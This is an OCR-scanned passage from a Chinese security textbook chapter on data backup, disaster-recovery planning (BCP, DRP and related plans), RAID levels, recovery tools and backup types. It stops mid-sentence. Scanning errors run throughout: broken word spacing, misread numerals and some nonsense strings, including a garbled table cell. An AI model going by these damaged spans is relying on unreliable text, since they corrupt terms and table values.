备份 是 指 用 户 为 应 用 系统 产生 的 重要 数据 (或 者 原 有 的 重要 数据 信息 ?制作 一 份 或 者 多 
份 副本 ,以 增强 数据 的 安全 性 。 

备份 与 容 灾 关注 的 对 象 不 同 ,备份 关注 数据 的 安全 , 容 灾 关注 业务 应 用 的 安全 。 

可 以 把 备份 称 作 是 “数据 保护 ”, 而 容 灾 称 作 “ 业 务 应 用 保护 ”。 
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备份 通过 备份 软件 使 用 磁带 机 或 者 磁带 库 ( 有 些 用 户 使 用 磁盘 .光盘 ) 作 为 存储 介质 将 
数据 进行 复制 , 容 灾 则 表现 为 通过 高 可 用 方案 将 两 个 站 点 或 者 系统 连接 起 来 。 

备份 与 容 灾 是 存储 领域 两 个 非常 重要 的 部 分 ,二 者 有 着 密切 的 联系 。 

首先 ,在 备份 与 容 灾 中 都 有 数据 保护 工作 ,备份 大 多 采用 磁带 方式 ,性 能 低 ,成 本 低 ; 容 
灾 采 用 磁盘 方式 进行 数据 保护 ,数据 随时 在 线 ,性 能 高 ,成 本 高 。 

其 次 ,备份 是 存储 领域 的 一 个 基础 ,在 一 个 完整 的 容 灾 方 案 中 必然 包括 备份 的 部 分 ; 同 
时 备份 还 是 容 灾 方案 的 有 效 补充 ,因为 容 灾 方案 中 的 数据 始终 在 线 , 因 此 存储 有 完全 被 破坏 
的 可 能 ,而 备份 提供 了 额外 的 一 条 防线 ,即使 在 线 数据 丢失 也 可 以 从 备份 数据 中 恢复 。 

数据 容 灾 与 数据 备份 的 联系 主要 体现 在 以 下 几 个 方面 。 

(1) 数据 备份 是 数据 容 灾 的 基础 。 数 据 备份 是 数据 高 可 用 的 最 后 一 道 防线 ,其 目的 是 
系统 数据 骨 溃 时 能 够 快速 地 恢复 数据 。 虽 然 它 也 算 一 种 容 灾 方 案 ,但 这 种 容 灾 能 力 非常 有 
PR ,因为 传统 的 备份 主要 是 采用 数据 内 置 或 外 置 的 磁带 机 进行 冷 备份 , 备 份 磁带 同时 也 在 机 
房 中 统一 管理 ,一旦 整个 机 房 出 现 了 灾难 ,如 火灾 、 盗 窃 和 地 震 等 灾难 时 ,这 些 备份 磁带 也 随 
之 销毁 ,所 存储 的 磁带 备份 也 起 不 到 任何 容 灾 功能 。 

(2) 容 灾 不 是 简单 备份 。 真 正 的 数据 容 灾 就 是 要 避免 传统 冷 备份 所 具有 的 先天 不 足 ， 
它 能 在 灾难 发 生 时 ,全 面 、 及 时 地 恢复 整个 系统 。 不 过 数据 备份 还 是 最 基础 的 ,没有 备份 的 
数据 ,任何 容 灾 方案 都 没有 现实 意义 。 而 容 灾 对 于 IT 而 言 , 是 能 够 提供 一 个 防止 各 种 灾难 
的 计算 机 信息 系统 。 

(3) 容 灾 不 仅 是 技术 。 容 灾 是 一 个 系统 工程 ,不 仅 包括 各 种 容 灾 技 术 , 还 应 有 一 整套 容 
灾 流 程 、 规 范 及 其 具体 措施 。 

数据 备份 技术 与 容 灾 技 术 的 功能 联系 见 表 8-2。 


表 8-2 数据 备份 技术 与 容 灾 技术 的 功能 联系 


项 目 数据 备份 技术 容 灾 技术 
物理 硬件 故障 是 是 
病毒 发 作 是 部 分 
防范 意外 事件 人 为 误 操 作 是 部 分 
人 为 恶意 破坏 是 否 
自然 灾害 5 是 
数据 和 文件 是 是 
应 用 和 设置 部 分 是 
保护 对 象 操作 系统 部 分 是 
网 络 系统 否 是 
供电 系统 否 是 
系统 连续 性 不 保证 保证 
系统 恢复 数据 损失 有 少量 损失 完全 不 损失 
可 恢复 到 时 间 点 多 个 当前 
其 他 方面 数据 管理 方式 搬移 到 离线 在 线 同 步 
适用 系统 规模 任何 系统 规模 大 型 系统 
9. 容 灾 计划 


严格 地 说 , 容 灾 计 划 包 括 一 系列 应 急 计 划 ,如 业务 持续 计划 .业务 恢复 计划 .操作 连续 性 
305 


计划 、 事 件 响应 计划 、 场 所 紧急 计划 、 危 机 通信 计划 、 灾 难 恢复 计划 等 。 

CD 业务 持续 计划 (Business Continuity Plan,BCP)。 业 务 持续 计划 是 一 套用 来 降低 组 
织 的 重要 营运 功能 遭受 未 料 的 中 断 风 险 的 作业 程序 , 它 可 能 是 人 工 或 系统 自动 的 。 业 务 持 
续 计划 的 目的 是 使 一 个 组 织 及 其 信息 系统 在 灾难 事件 发 生 时 仍 可 以 继续 运作 。 

(2) 业务 恢复 计划 (Business Recovery Plan,BRP)。 业 务 恢 复 计 划 也 称 业 务 继续 计划 , 
涉及 紧急 事件 后 对 业务 处 理 的 恢复 ,但 与 BCP 不 同 , 它 在 整个 紧急 事件 或 中 断 过 程 中 缺乏 
确保 关键 处 理 的 连续 性 的 规程 。BRP 的 制定 应 该 与 灾难 恢复 计划 及 BCP 进行 协调 。BRP 
应 该 附加 在 BCP 之 后 。 

(3) 操作 连续 性 计划 (Continuity of Operations Plan,COOP) 。 操 作 连 续 性 计划 关注 的 
是 位 于 机 构 ( 通 常 是 总 部 单位 ) 备 用 站 点 的 关键 功能 以 及 这 些 功能 在 恢复 到 正常 操作 状态 之 
前 最 多 30 天 的 运行 。 由 于 COOP 涉及 总 部 级 的 问题 , 它 和 BCP 是 互相 独立 制定 和 执行 的 。 
COOP 的 标准 要 素 包 括 职权 条 款 、 连 续 性 的 顺序 和 关键 记录 和 数据 库 。 由 于 COOP 强调 机 
构 在 备用 站 点 恢复 运行 中 的 能 力 ,所 以 该 计划 通常 不 包括 IT 运行 方面 的 内 容 。 另 外 , 它 不 
涉及 无 须 重新 配置 到 备用 站 点 的 小 型 危害 。 但 是 COOP 可 以 将 BCP、BRP 和 灾难 恢复 计划 
作为 附录 。 

(4) 事件 响应 计划 (Incident Response Plan,IRP)。 事 件 响应 计划 建立 了 处 理 针 对 机 构 
的 IT 系统 攻击 的 规程 。 这 些 规程 用 来 协助 安全 人 员 对 有 害 的 计算 机 事件 进行 识别 、 消 减 
并 进行 恢复 ,这些 事件 的 例子 包括 对 系统 或 数据 的 非法 访问 .拒绝 服务 攻击 或 对 硬件 .软件 、 
数据 的 非法 更 改 ( 如 有 害 逻辑 : 病毒 .蠕虫 或 木马 等 ) 。 本 计划 可 以 包含 在 BCP 的 附录 中 。 

(5) 场所 紧急 计划 (Occupant Emergency Plan,OEP)。 场所 紧急 计划 (OEP) 在 可 能 对 
人 员 的 安全 健康 、 环 境 或 财产 构成 威胁 的 事件 发 生 时 ,为 设施 中 的 人 员 提 供 反 应 规程 。 
OEP 在 设施 级 别 进行 制定 ,与 特定 的 地 理 位 置 和 建筑 结构 有 关 。 设 施 OEP 可 以 附加 在 
BCP 之 后 ,但 是 独立 执行 。 

(6) 危机 通信 计划 (Crisis Communication Plan,CCP)。 机 构 应 该 在 灾难 之 前 做 好 其 内 
部 和 外 部 通信 和 规程 的 准备 工作 。 危 机 通信 计划 (CCP) 通 常 由 负责 公共 联络 的 机 构 制定 。 危 
机 通信 计划 规程 应 该 和 所 有 其 他 计划 协调 ,以 确保 只 有 受到 批准 的 内 容 公 之 于 众 , 它 应 该 作 
为 附录 包含 在 BCP 中 。 通 信 计 划 通 常 指定 特定 的 人 员 作 为 在 灾难 反应 中 回答 公众 问题 的 
唯一 发 言 人 。 它 还 可 以 包括 向 个 人 和 公众 散发 状态 报告 的 规程 ,如 记者 招待 会 的 模板 。 

(7) 灾难 恢复 计划 (Disaster Recovery Plan,DRP)。 正 如 其 名 字 所 表示 的 ,灾难 恢复 计 
划 应 用 于 重大 、 通 常 是 灾难 性 、 造 成 长 时 间 无 法 对 正常 设施 进行 访问 的 事件 。 通 常 ,DRP 指 
用 于 紧急 事件 后 在 备用 站 点 恢复 目标 系统 、 应 用 或 计算 机 设施 运行 的 IT 计划 。DRP 的 范 
围 可 能 与 IT 应 急 计划 重 释 , 但 是 DRP 的 范围 比较 狭窄 , 它 不 涉及 无 须 重新 配置 的 小 型 危 
害 。 根 据 机 构 的 需要 ,可 能 会 有 多 个 DRP 附加 在 BCP 之 后 。 灾 难 恢复 计划 的 目的 是 将 灾 
难 造 成 的 影响 减少 到 最 小 程度 ,并 采取 必要 的 步骤 来 保证 资源 .员工 和 业务 流程 能 够 继续 运 
行 。 灾 难 恢复 计划 和 业务 连续 性 计划 不 同 , 业 务 连续 性 计划 用 来 为 长 时 间 的 停工 和 灾难 提 
供 处 理 方法 和 步骤 。 而 灾难 恢复 计划 的 目标 是 在 灾难 发 生 后 马上 处 理 灾难 及 其 后 果 。 灾 难 
恢复 计划 在 所 有 事情 都 还 处 于 紧急 状态 时 就 开始 执行 ,而 业务 连续 性 计划 考虑 问题 的 方面 
更 加 长 远 。 
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10. 组 织 与 职责 分 配 

在 确定 了 灾难 恢复 计划 后 ,必须 组 建 合适 的 团队 来 实施 恢复 策略 ,并 确定 与 各 个 团队 相 
关 的 关键 决策 者 \ 信 息 部 门 和 终端 用 户 的 相关 职责 。 这 些 团队 负责 对 事件 进行 响应 ,对 功能 
进行 恢复 和 使 系统 回 到 正常 运行 状态 。 这 些 团 队 的 数量 和 种 类 根据 组 织 规模 和 需要 来 组 
织 , 主 要 包括 以 下 。 

CD 事件 响应 小 组 。 一 旦 发 生 威 胁 到 信息 资产 和 业务 流程 的 安全 事件 ,就 必须 及 时 上 
报到 事件 响应 小 组 ,事件 响应 小 组 根据 对 事件 的 初步 分 析 , 确 定 事件 的 性 质 ,通知 有 关 团 队 
采取 下 一 步行 动 。 

(2) 应 急行 动 小 组 。 针 对 灾难 事件 的 第 一 时 间 响 应 小 组 。 由 处 理 火 灾 的 救火 员 或 其 他 
突 发 事件 人 员 组 成 。 他 们 的 首要 职责 是 有 序 地 下 散 危险 环境 下 的 员工 ,包括 员工 生命 安全 。 

(3) 损失 评估 小 组 。 评 估 灾 难 的 范围 。 通 常 由 能 评估 灾难 程度 和 恢复 时 间 的 专业 人 士 
组 成 。 损 失 评估 小 组 有 责任 指出 灾难 发 生 的 原因 ,以 及 业务 中 断 造 成 的 影响 大 小 。 

(4) 应 急 管 理 小 组 。 负 责 启 动 灾 难 恢 复 计 划 并 监督 恢复 操作 的 运行 ,并 对 灾难 恢复 过 
程 中 的 重大 问题 做 出 决策 。 

(5) 异地 存储 小 组 。 获取、 包装 、 运 送 备 份 介质 和 相关 记录 文件 到 灾难 恢复 地 点 ,同时 
在 恢复 站 点 运行 期 间 ,建立 和 检查 新 产生 数据 的 异地 备份 工作 。 

此 外 ,还 可 以 包括 应 急 作 业 小 组 、 应 用 软件 小 组 、 系 统 软 件 小 组 、 安 全 小 组 .网 络 恢复 小 
组 .通信 小 组 .运输 小 组 、 硬 件 小 组 .供应 小 组 ,协调 小 组 .异地 安置 小 组 法律 事务 小 组 .恢复 
测试 小 组 .培训 小 组 等 。 


8.1.2 RAID 简介 


RAID 最 初 是 Redundant Array of Independent Disk( 独 立 磁盘 宛 余 阵列 ) 的 缩写 ,后 来 
由 于 廉价 磁盘 的 出 现 ,RAID 成 为 Redundant Array of Inexpensive Disks Hf ffr Ri 4 264 KE 
列 ) 的 缩写 。RAID 技术 诞生 于 1987 年 ,由 美国 加 州 大 学 伯克利 分 校 提出 RAID 的 基本 想 
法 是 把 多 个 便宜 的 小 磁盘 组 合 到 一 起 ,成 为 一 个 磁盘 组 ,使 性 能 达到 或 超过 一 个 容量 巨大 、 
价格 昂贵 的 磁盘 。 虽 然 RAID 包含 多 块 磁盘 ,但 是 在 操作 系统 下 是 作为 一 个 独立 的 大 型 存 
储 设备 出 现 。RAID 技术 分 为 几 种 不 同 的 等 级 ,分 别 可 以 提供 不 同 的 速度 ,安全 性 和 性 
价 比 。 

RAID 技术 起 初 主 要 应 用 于 服务 器 高 端 市 场 ,但 是 随 着 IDE 硬盘 性 能 的 不 断 提 升 、 
RAID 芯片 的 普及 .个 人 用 户 市 场 的 成 熟 和 发 展 , 正 不 断 向 低 端 市 场 靠拢 ,从 而 为 用 户 提供 
了 一 种 既 可 以 提升 硬盘 速度 ,又 能 够 确保 数据 安全 性 的 良好 的 解决 方案 。 

目前 RAID 技术 大 致 分 为 两 种 : 基于 硬件 的 RAID 技术 和 基于 软件 的 RAID 技术 。 

RAID 按照 实现 原理 的 不 同 分 为 不 同 的 级 别 , 不 同 的 级 别 之 间 工 作 模 式 是 有 区 别 的 。 

1. RAID 0( 无 差错 控制 的 带 区 组 ) 

RAID 0 是 最 简单 的 一 种 形式 ,也 称 为 条 带 模式 (Striped) , 即 把 连续 的 数据 分 散 到 多 个 
磁盘 上 存 取 , 如 图 8-1 所 示 。 当 系统 有 数据 请 求 就 可 以 被 多 个 磁盘 并 行 执行 ,每 个 磁盘 执行 
属于 它 自己 的 那 部 分 数据 请 求 。 这 种 在 数据 上 的 并 行 操作 可 以 充分 利用 总 线 的 带宽 ,显著 
提高 磁盘 整体 存 取 性 能 。 因 为 数据 分 布 在 不 同 驱动 器 上 ,所 以 数据 吞吐 率 大 大 提高 ,驱动 器 
的 负载 也 比较 平衡 。RAID 0 中 的 数据 映射 如 图 8-2 所 示 。 
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图 8-2 RAID 0 中 的 数据 映射 


2. RAID 1( 镜 像 结 构 ) 

虽然 RAID 0 可 以 提供 更 多 的 空间 和 更 好 的 性 能 .但 是 整个 系统 是 非常 不 可 靠 的 ， 
RAID 1 和 RAID 0 截然 不 同 , 其 技术 重点 全 部 放 在 如 何 能 够 在 不 影响 性 能 的 情况 下 最 大 限 
度 地 保证 系统 的 可 靠 性 和 可 修复 性 上 。 这 种 阵列 可 靠 性 很 高 ,但 其 有 效 容量 减 小 到 总 容量 
的 一 半 , 同 时 这 些 磁盘 的 大 小 应 该 相等 ,否则 总 容量 只 具有 最 小 磁盘 的 大 小 。 

RAID 1 中 每 一 个 磁盘 都 具有 一 个 对 应 的 镜像 盘 。 对 任何 一 个 磁盘 的 数据 写 入 都 会 被 
复制 镜像 盘 中 ,如 图 8-3 所 示 。RAID 1 是 所 有 RAID 等 级 中 实现 成 本 最 高 的 一 种 ,因为 所 
能 使 用 的 空间 只 是 所 有 磁盘 容量 总 和 的 一 半 。 尽 管 如 此 ,人 们 还 是 选择 RAID 1 来 保存 那 
些 关键 性 的 重要 数据 。 

3. RAID 2( 带 海 明 码 校 验 ) 

RAID 2 与 RAID 3 类 似 , 两 者 都 是 将 数据 条 块 化 分 布 于 不 同 的 硬盘 上 ,条 块 单位 为 位 
或 字 节 。 然 而 RAID 2 使 用 一 定 的 编码 技术 来 提供 错误 检查 及 恢复 ,这 种 编码 技术 需要 多 
个 磁盘 存放 检查 及 恢复 信息 ,使 得 RAID 2 技术 实施 更 复杂 。 因 此 ,在 商业 环境 中 很 少 使 
用 。 如 图 8-4 所 示 ,左边 的 各 个 磁盘 上 是 数据 的 各 个 位 .由 一 个 数据 不 同 的 位 运算 得 到 的 海 
明 校 验 码 可 以 保存 另 一 组 磁盘 上 。 由 于 海 明 码 的 特点 , 它 可 以 在 数据 发 生 错误 的 情况 下 将 
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图 8-4 RAID 2( 带 海 明 码 校 验 ) 


错误 校正 ,以 保证 输出 的 正确 。 

4. RAID 3( 带 奇偶 校 验 码 的 并 行 传送 ) 

RAID 3 是 以 一 个 硬盘 来 存放 数据 的 奇偶 校 验 位 ,数据 则 分 段 存 储 于 其 余 硬 盘 中 。 它 
像 RAID 0 一 样 以 并 行 的 方式 来 存放 数 , 但 速度 没有 RAID 0 快 。 如 果 数 据 盘 (物理 ) 损 坏 ， 
只 要 将 坏 硬 盘 换 掉 ,RAID 控制 系统 则 会 根据 校 验 盘 的 数据 校 验 位 在 新 盘 中 重建 坏 盘 上 的 
数据 。 不 过 ,如 果 校 验 盘 (物理 ) 损 坏 , 则 全 部 数据 都 无 法 使 用 。 利 用 单独 的 校 验 盘 来 保护 数 
据 虽 然 没 有 镜像 的 安全 性 高 ,但 是 硬盘 利用 率 得 到 了 很 大 的 提高 。 

例如 ,如 图 8-5 所 示 ,在 一 个 由 5 块 硬盘 构成 的 RAID 3 系统 中 ,4 块 硬盘 将 被 用 来 保存 
数据 ,第 5 块 硬盘 则 专门 用 于 校 验 。 第 5 块 硬盘 中 的 每 一 个 校 验 块 所 包含 的 都 是 其 他 4 块 
硬盘 中 对 应 数据 块 的 校 验 信息 。 


图 8-5 RAID 3( 带 奇偶 校 验 码 的 并 行 传送 ) 


RAID 3 虽然 具有 容错 能 力 ,但 是 系统 会 受到 影响 。 当 一 块 磁盘 失效 时 ,该 磁盘 上 的 所 
有 数据 块 必 须 使 用 校 验 信 息 重 新 建立 。 如 果 我 们 是 从 好 盘 中 读 取 数据 块 , 不 会 有 任何 变化 。 
但 是 如 果 我 们 所 要 读 取 的 数据 块 正好 位 于 已 经 损坏 的 磁盘 . 则 必须 同时 读 取 同一 带 区 中 的 
所 有 其 他 数据 块 , 并 根据 校 验 值 重 建 丢失 的 数据 。 

当 更 换 了 损坏 的 磁盘 之 后 ,系统 必须 一 个 数据 块 一 个 数据 块 地 重建 坏 盘 中 的 数据 。 整 
个 过 程 包括 读 取 带 区 ,计算 丢失 的 数据 块 和 向 新 盘 写 人 新 的 数据 块 , 都 是 在 后 台 自 动 进行 。 
重建 活动 最 好 是 在 RAID 系统 空闲 时 进行 ,否则 整个 系统 的 性 能 会 受到 严重 的 影响 。 

5. RAID 4( 块 奇偶 校 验 阵列 ) 

与 RAID 3 类 似 . 所 不 同 的 是 , 它 对 数据 的 访问 是 按 数 据 块 进行 的 , 即 按 磁盘 进行 ,每 次 
是 一 个 盘 。 数 据 是 以 扇 区 交错 方式 存储 于 各 台 磁 盘 , 也 称 块 间 插入 校 验 。 采 用 单独 奇偶 校 
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验 盘 , 如 图 8-6 所 示 。 
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8-6 RAID 4( 块 奇偶 校 验 阵 列 ) 


6. RAID 5( 块 分 布 奇 偶 校 验 阵列 ) 

与 RAID 4 类 似 ,但 校 验 数据 不 固定 在 一 个 磁盘 上 ,而 是 循环 地 依次 分 布 在 不 同 的 磁盘 
上 ,也 称 块 间 插入 分 布 校 验 。 它 是 目前 采用 最 多 、 最 流行 的 方式 ,至 少 需 要 3 个 硬盘 。 这 样 
就 避免 了 RAID 4 中 出 现 的 瓶颈 问题 。 如 果 其 中 一 块 磁盘 出 现 故 障 , 那 么 由 于 有 校 验 信息 ， 
所 以 所 有 数据 仍然 可 以 保持 不 变 。 如 果 可 以 使 用 备用 磁盘 ,那么 在 设备 出 现 故障 之 后 ,将 立 
即 开始 同步 数据 。 如 果 两 块 磁盘 同时 出 现 故障 ,那么 所 有 数据 都 会 丢失 。RAID 5 可 以 经 
受 一 块 磁盘 故障 ,但 不 能 经 受 两 块 或 多 块 磁盘 故障 。 

如 图 8-7 所 示 ,奇偶 校 验 码 存在 于 所 有 磁盘 上 ,其 中 的 Po 代表 第 0 带 区 的 奇偶 校 验 值 ， 
其 他 的 意思 也 相同 。RAID 5 的 读 出 效率 很 高 , 写 入 效率 一 般 , 块 式 的 集体 访问 效率 不 错 。 
因为 奇偶 校 验 码 在 不 同 的 磁盘 上 ,所 以 提高 了 可 靠 性 。 但 是 它 对 数据 传输 的 并 行 性 解决 不 
好 ,而 且 控 制 器 的 设计 也 相当 困难 。RAID 3 与 RAID 5 相 比 ,重要 的 区 别 在 于 RAID 3 每 
进行 一 次 数据 传输 , 需 涉 及 所 有 的 阵列 盘 。 而 对 于 RAID 5 来 说 ,大 部 分 数据 传输 只 对 一 块 
磁盘 操作 ,可 进行 并 行 操作 。 
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图 8-7 RAID 5( 块 分 布 奇偶 校 验 阵列 》 


7. RAID 6( 双 重 块 分 布 奇 偶 校 验 阵列 ) 

RAID 6 是 在 RAID 5 基础 上 扩展 而 来 的 。 与 RAID 5 一 样 ,数据 和 校 验 码 都 是 被 分 成 
数据 块 然后 分 别 存储 到 磁盘 阵列 的 各 个 硬盘 上 。 只 是 RAID 6 中 增加 一 块 校 验 磁盘 ,用 于 
备份 分 布 在 各 个 磁盘 上 的 校 验 码 ,如 图 8-8 所 示 ,这 样 RAID 6 磁盘 阵列 就 允许 两 个 磁盘 同 
时 出 现 故障 ,所 以 RAID 6 的 磁盘 阵列 最 少 需要 4 块 硬盘 。 

8. RAID 0 十 1( 高 可 靠 性 与 高 效 磁盘 结构 ) 

JE RAID 0 和 RAID 1 技术 结合 起 来 ,. 即 RAID 0 十 1。 具 有 极 高 可 靠 性 的 高 性 能 磁盘 阵 
列 。 它 将 两 组 磁盘 按照 RAID 0 的 形式 组 成 阵列 ,每 组 磁盘 按照 RAID 1 的 形式 实施 容错 。 数 
据 除 分 布 在 多 个 盘 上 外 ,每 个 盘 都 有 其 物理 镜像 盘 ,提供 全 元 余 能 力 , 人 允许 一 个 以 下 磁盘 故障 ， 
而 不 影响 数据 可 用 性 ,并 具有 快速 读 / 写 能 力 。 要 求 至 少 4 个 硬盘 才能 做 成 RAID 0 十 1。 
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8-8 RAID 6( 双 重 块 分 布 奇 偶 校 验 阵列 》 


9. RAID 53( 高 效 数据 传送 磁盘 结构 ) 

具有 高 输入 输出 性 能 的 磁盘 阵列 。 将 两 组 磁盘 按照 RAID 0 的 形式 组 成 阵列 ,每 组 磁 
盘 按 照 RAID 3 的 形式 实施 容错 ,因此 它 速 度 比 较 快 ,也 有 容错 功能 。 但 价格 十 分 高 ,不易 
于 实现 。 


8.1.3 数据 恢复 工具 


流行 的 数据 恢复 工具 有 FinalData, EasyRecovery , DataExplore, R-Studio 和 Lost&.Found。 

1. FinalData 

FinalData 在 数据 恢复 方面 功能 也 十 分 强大 ,恢复 速度 快 。 

2. EasyRecovery 

EasyRecovery 是 一 个 功能 强大 而 且 非 常 容易 使 用 的 老牌 数据 恢复 工具 , 它 可 以 快速 地 
找 回 被 误 删除 的 文件 或 者 文件 夹 ,支持 FAT 和 NTFS 文件 系统 。 

3. DataExplore 

DataExplore 是 一 款 功 能 强大 ,提供 了 较 低 层次 恢复 功能 的 数据 恢复 软件 ,只 要 数据 没 
有 被 覆盖 掉 ,文件 就 能 找 得 到 ,本 软件 无 须 安 装 ,解压 后 可 以 直接 运行 ,请 不 要 在 待 恢复 的 分 
区 上 运行 本 软件 。 本 软件 支持 FAT、NTFS、EXT2 文件 系统 。 

4. R-Studio 

R-Studio 是 损坏 硬盘 上 资料 的 救星 。 

5. Lost& Found 

Lost&Found 是 出 品 Partition Magic 的 PowerQuest 公司 所 出 的 产品 ,是 一 套 因 病毒 
感染 .意外 格式 化 等 因素 所 导致 损失 的 硬盘 资料 恢复 工具 软件 ,该 工具 只 能 在 DOS 下 使 用 。 


82 数据 备份 技术 


2001 年 9 月 11 日 ,世贸 双子 楼 倒塌 ,但 位 于 世贸 中 心 内 的 著名 财经 咨询 公司 摩根 斯 坦 
利 公司 在 灾后 第 二 天 就 进入 了 正常 的 工作 状态 ,在 危机 时 刻 公司 的 远程 数据 防 灾 系 统 忠 实 
地 工作 到 大 楼 倒塌 前 的 最 后 一 秒 钟 ,此 前 的 所 有 商务 资料 已 安全 地 备份 到 了 离世 贸 中 心 数 
干 米 之 遥 的 第 二 个 办 事 处 。 摩 根 斯 坦 利 公司 的 数据 安全 战略 将 突 发 危机 的 不 利 影响 降 到 最 
低 程 度 。 
1. 数据 备份 的 定义 
数据 备份 就 是 将 数据 以 某 种 方式 加 以 保留 ,以便 在 系统 遭受 破坏 或 其 他 特定 情况 下 , 重 
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新 加 以 利用 的 一 个 过 程 。 

数据 备份 的 根本 目的 是 重新 利用 , 即 备份 工作 的 核心 是 恢复 ,一 个 无 法 恢复 的 备份 ,对 
任何 系统 来 说 都 是 毫 无 意义 的 。 一 个 成 熟 的 备份 系统 能 够 安全 方便 而 又 高 效 地 恢复 数据 。 

数据 备份 作为 存储 领域 的 一 个 重要 组 成 部 分 ,其 在 存储 系统 中 的 地 位 和 作用 都 是 不 容 
忽视 的 。 对 一 个 完整 的 IT 系统 而 言 ,备份 工作 是 其 中 必 不 可 少 的 组 成 部 分 。 其 意义 不 仅 
在 于 防范 意外 事件 的 破坏 ,而 且 还 是 历史 数据 保存 归档 的 最 佳 方式 。 换 言 之 ,即便 系统 正常 
工作 ,没有 任何 数据 丢失 或 破坏 发 生 , 备 份 工作 仍然 具有 非常 大 的 意义 (为 我 们 进行 历史 数 
据 查询 、 统 计 和 分 析 , 以 及 重要 信息 归档 保存 提供 了 可 能 ) 。 

简单 地 说 ,通过 数据 备份 ,一 个 存储 系统 乃至 整个 网 络 系统 ,完全 可 以 回 到 过 去 的 某 个 
时 间 状 态 , 或 者 重新 “克隆 ”一 个 指定 时 间 状 态 的 系统 ,只 要 在 这 个 时 间 点 上 ,我 们 有 一 个 完 
整 的 系统 数据 备份 。 从 实质 上 来 说 ,数据 备份 是 指数 据 从 在 线 状态 剥离 到 离线 状态 的 过 程 ， 
这 与 服务 器 高 可 用 集群 技术 以 及 远程 容 灾 技术 ,在 本 质 上 有 所 区 别 。 虽 然 从 目的 上 讲 , 这 些 
技术 都 是 为 了 消除 或 减弱 意外 事件 给 系统 带 来 的 影响 ,但 是 ,由 于 其 侧重 的 方向 不 同 ,实现 
的 手段 和 产生 的 效果 也 不 尽 相 同 。 集 群 和 容 灾 技术 的 目的 是 保证 系统 的 可 用 性 。 也 就 是 
说 , 当 意 外 发 生 时 ,系统 所 提供 的 服务 和 功能 不 会 因此 而 间断 。 对 数据 而 言 ,集群 和 容 灾 技 
术 是 保护 系统 的 在 线 状 态 ,保证 数据 可 以 随时 被 访问 。 备 份 技术 的 目的 ,是 将 整个 系统 的 数 
据 或 状态 保存 下 来 ,这 种 方式 不 仅 可 以 挽回 硬件 设备 坏 损 带 来 的 损失 ,也 可 以 挽回 逻辑 错误 
和 人 为 恶意 破坏 的 损失 。 但 是 ,数据 备份 技术 并 不 保证 系统 的 实时 可 用 性 。 也 就 是 说 ,一 旦 
意外 发 生 , 备 份 技术 只 保证 数据 可 以 恢复 ,但 是 恢复 过 程 需要 一 定 的 时 间 ,在 此 期 间 , 系 统 是 
不 可 用 的 。 在 具有 一 定 规模 的 系统 中 ,备份 技术 、 集 群 技术 和 容 灾 技 术 互 相 不 可 替代 ,并 且 
稳定 和 谐 地 配合 工作 ,共同 保证 着 系统 的 正常 运转 。 

在 系统 正常 工作 的 情况 下 ,数据 备份 工作 是 系统 的 “额外 负担 ”, 会 给 正常 业务 系统 带 来 
一 定性 能 和 功能 上 的 影响 ,所 以 数据 备份 系统 应 尽量 减少 这 种 “额外 负担 ”, 从 而 更 充分 地 保 
证 系统 正常 业务 的 高 效 运行 ,这 是 数据 备份 技术 发 展 过 程 中 要 解决 的 一 个 重要 问题 。 对 一 
个 相当 规模 的 系统 来 说 ,完全 自动 化 地 进行 备份 工作 是 对 备份 系统 的 一 个 基本 要 求 。 此 外 ， 
CPU 占用 、 磁 盘 空 间 占 用 、 网 络 带宽 占用 、 单 位 数据 量 的 备份 时 间 等 都 是 衡量 备份 系统 性 能 
的 重要 因素 。 备 份 系统 的 选择 和 优化 工作 是 一 个 至 关 重 要 的 任务 ,一 个 好 的 备份 系统 ,应 该 
能 够 以 很 低 的 系统 资源 占用 率 和 很 少 的 网 络 带宽 ,来 进行 自动 而 高 速度 的 数据 备份 。 

2. 数据 备份 技术 分 类 

CD 按 备份 的 数据 量 来 划分 

按 备份 的 数据 量 来 划分 ,有 完全 备份 、 差 量 备份 、 增 量 备份 和 按 需 备份 。 

(D 完全 备份 (Full Backup)。 备 份 系统 中 的 所 有 数据 (包括 系统 和 数据 ) ,特点 是 备份 所 
需 的 时 间 最 长 ,但 恢复 时 间 最 短 ,操作 最 方便 ,也 最 可 靠 。 这 种 备份 方式 的 好 处 是 很 直观 , 容 
易 被 人 理解 ,而 且 当 发 生 数据 丢失 的 灾难 时 ,只 要 用 一 盘 磁 带 ( 即 灾难 发 生前 一 天 的 备份 磁 
带 ) ,就 可 以 恢复 丢失 的 数据 。 但 它 也 有 不 足 之 处 : 首先 ,由 于 每 天 都 对 系统 进行 完全 备份 ， 
因此 在 备份 数据 中 有 大 量 内 容 是 重复 的 ,如 操作 系统 与 应 用 程序 。 这 些 重复 的 数据 占用 了 
大 量 的 磁带 空间 ,这 对 用 户 来 说 就 意味 着 增加 成 本 ; 其 次 ,由 于 需要 备份 的 数据 量 相当 大 ， 
因此 备份 所 需 时 间 较 长 。 对 于 那些 业务 繁忙 ,备份 时 间 有 限 的 单位 来 说 ,选择 这 种 备份 策略 
无 疑 是 不 明智 的 。 
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© 差 量 备份 (Differential Backup)。 差 量 备份 只 备份 上 次 完全 备份 以 后 有 变化 的 数 
据 。 管 理 员 先 在 某 一 天 (比如 星期 一 ) 进 行 一 次 系统 完全 备份 ,然后 在 接 下 来 的 几 天 里 ,再 将 
当天 所 有 与 星期 一 不 同 的 数据 (增加 的 或 修改 的 ) 备 份 到 磁带 上 。 差 量 备份 无 须 每 天 都 做 系 
统 完全 备份 ,因此 备份 所 需 时 间 短 ,并 节省 磁带 空间 , 它 的 灾难 恢复 也 很 方便 ,系统 管理 员 只 
需 两 盘 磁 带 , 即 系统 全 备份 的 磁带 与 发 生 灾难 前 一 天 的 备份 磁带 ,就 可 以 将 系统 完全 恢复 。 

一 般 来 说 ,差分 备份 避免 了 完全 备份 与 增 量 备份 的 缺陷 又 具有 它们 的 优点 ,差分 备份 无 
须 每 天 都 做 系统 完全 备份 ,并 且 灾 难 恢复 也 很 方便 ,只 需 上 一 次 全 备份 磁带 和 灾难 发 生前 一 
天 磁带 ,因此 采用 完全 备份 结合 差分 备份 的 方式 较为 适宜 。 

© 增 量 备份 (Incremental Backup)。 增 量 备份 只 备份 上 次 备份 以 后 有 变化 的 数据 ,这 
种 备份 的 优点 是 没有 重复 的 备份 数据 ,占用 空间 较 少 ,缩短 了 备份 时 间 。 但 是 它 的 缺点 是 当 
发 生 灾难 时 ,恢复 数据 比较 麻烦 ,恢复 时 间 较 长 。 所 以 , 增 量 备份 比 差 量 备份 完成 得 要 快 一 
